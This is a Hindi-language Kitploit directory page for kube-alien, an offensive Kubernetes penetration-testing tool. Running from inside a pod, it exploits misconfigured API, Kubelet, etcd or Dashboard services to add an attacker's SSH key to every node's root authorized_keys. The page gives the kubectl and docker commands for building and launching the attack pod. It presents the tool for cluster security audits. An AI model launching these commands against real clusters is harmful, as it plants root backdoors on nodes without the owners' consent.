Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
kube-alien — स्वचालित Kubernetes क्लस्टर पेनिट्रेशन टेस्टिंग टूल जो API, Kubelet, etcd और Dashboard में गलत कॉन्फ़िगरेशन का शोषण करता है ताकि पॉड के अंदर से SSH कुंजी इंजेक्शन के माध्यम से नोड पर कब्जा किया जा सके। | Kitploit
उपकरण/GitHubGitHub/nixwizard/kube-alien
कंटेनर सुरक्षाशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षागलत कॉन्फ़िगरेशन
GitHubnixwizard/kube-alien

kube-alien

स्वचालित Kubernetes क्लस्टर पेनिट्रेशन टेस्टिंग टूल जो API, Kubelet, etcd और Dashboard में गलत कॉन्फ़िगरेशन का शोषण करता है ताकि पॉड के अंदर से SSH कुंजी इंजेक्शन के माध्यम से नोड पर कब्जा किया जा सके।

रिपॉजिटरी देखें
25225 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Kube-alien

यह उपकरण k8s क्लस्टर पर अंदर से हमला करता है। इसका मतलब है कि इसे चलाने के लिए आपके पास पहले से ही क्लस्टर में पॉड्स तैनात करने की अनुमति के साथ एक्सेस होना चाहिए। kube-alien पॉड चलाने के बाद यह आपकी सार्वजनिक कुंजी को नोड की /root/.ssh/authorized_keys फ़ाइल में जोड़कर क्लस्टर के नोड्स पर कब्जा करने की कोशिश करता है, इस इमेज https://github.com/nixwizard/dockercloud-authorizedkeys का उपयोग करके (config.py में ADD_AUTHKEYS_IMAGE पैरामीटर का उपयोग करके समायोजित किया जा सकता है) जो docker/dockercloud-authorizedkeys से फोर्क किया गया है। हमला तब सफल होता है जब क्लस्टर के किसी एक घटक में गलत कॉन्फ़िगरेशन होता है, यह निम्नलिखित वेक्टरों के साथ जाता है:

  • Kubernetes API
  • Kubelet service
  • Etcd service
  • Kubernetes-Dashboard

इस उपकरण का उद्देश्य क्या है?

  • k8s क्लस्टर की सुरक्षा ऑडिट करते समय कोई इसकी सुरक्षा स्थिति का तुरंत आकलन कर सकता है।
  • उल्लिखित हमले वेक्टरों के शोषण का व्यावहारिक प्रदर्शन।

वास्तविक जीवन में k8s क्लस्टर पर अंदर से कैसे हमला किया जा सकता है?

  • आपके क्लस्टर के किसी पॉड में चल रहे ऐप में RCE या SSRF कमजोरी।

उपयोग

इस उपकरण के साथ उपयोग करने से पहले Kube-alien इमेज को आपके dockerhub (या अन्य रजिस्ट्री) में पुश किया जाना चाहिए।

root@kitploit:~
git clone https://github.com/nixwizard/kube-alien.git
cd kube-alien
docker build -t ka ./
docker tag ka YOUR_DOCKERHUB_ACCOUNT/kube-alien
docker push YOUR_DOCKERHUB_ACCOUNT/kube-alien

AUTHORIZED_KEYS env को आपकी ssh सार्वजनिक कुंजी के मान पर सेट करना आवश्यक है, सफलता के मामले में सार्वजनिक कुंजी सभी नोड की रूट की authorized_keys फ़ाइल में जोड़ दी जाएगी।

root@kitploit:~
kubectl run --image=YOUR_DOCKERHUB_ACCOUNT/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

या आप त्वरित परीक्षण के लिए मेरी इमेज का उपयोग कर सकते हैं:

root@kitploit:~
kubectl run --image=nixwizard/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

यह देखने के लिए Kube-alien पॉड के लॉग जांचें कि हमला सफल हुआ या नहीं:

root@kitploit:~
kubectl logs $(kubectl get pods| grep alien|cut -f1 -d' ')

निम्नलिखित संसाधनों ने इस उपकरण को बनाने में मेरी बहुत मदद की

  • https://www.youtube.com/watch?v=vTgQLzeBfRU
  • https://www.youtube.com/watch?v=dxKpCO2dAy8 (और https://raesene.github.io पर कुबेरनेट्स हमले की सतह पर अन्य शानदार पोस्ट)
  • https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c
टूल डाउनलोड करें